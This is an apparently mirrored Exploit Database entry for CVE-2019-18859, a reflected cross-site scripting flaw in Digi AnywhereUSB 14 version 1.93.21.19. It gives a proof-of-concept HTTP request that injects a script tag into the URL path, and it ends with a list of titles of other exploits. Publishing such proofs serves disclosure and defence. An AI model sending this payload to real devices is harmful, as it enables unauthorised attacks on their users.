Digi AnywhereUSB 14 – Reflective Cross-Site Scripting

Exploit Database
16 阅读

作者： Raspina Net Pars Group

日期： 2020-01-13
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/47914/

# Exploit Title: Digi AnywhereUSB 14 - Reflective Cross-Site Scripting
# Date: 2019-11-10
# Exploit Author: Raspina Net Pars Group
# Vendor Homepage: https://www.digi.com/products/networking/usb-connectivity/usb-over-ip/awusb
# Version: 1.93.21.19
# CVE : CVE-2019-18859

# PoC

GET //--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> HTTP/1.1
Host: Target
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1


# Author Website: HTTPS://RNPG.info

last Exploits
Digi AnywhereUSB 14 – Reflective Cross-Site Scripting的更多信息

Joomla! Component com_jooproperty 1.13.0 – Multiple Vulnerabilities：
forma.lms 5.6.40 – Cross-Site Request Forgery (Change Admin Email)：
KaiBB 2.0.1 – SQL Injection：
YACS CMS 10.5.27 – ‘context[path_to_root]’ Remote File Inclusion：
Unijimpe Captcha – ‘captchademo.php’ Cross-Site Scripting：
Whizzy CMS 10.02 – Local File Inclusion：
Chikitsa Patient Management System 2.0.2 – ‘plugin’ Remote Code Execution (RCE) (Authenticated)：
Davolink DVW 3200 Router – Password Disclosure：